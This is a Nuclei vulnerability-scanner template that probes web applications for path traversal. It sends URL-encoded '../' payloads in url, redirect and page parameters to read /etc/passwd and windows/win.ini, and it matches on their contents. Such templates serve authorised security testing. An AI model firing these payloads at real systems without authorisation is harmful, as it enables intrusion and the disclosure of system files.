nuclei-templates/fuzzing/arbitrary-file-read.yaml

30 lines
1.0 KiB
YAML

id: arbitrary-file-read
info:
name: Arbitrary File Read
author: Sushant Kamble (https://in.linkedin.com/in/sushantkamble)
severity: high
description: Searches for /etc/passwd on passed URLs.
tags: fuzz,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
- "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
- "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
- "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2fwindows/win.ini"
- "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
- "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
part: body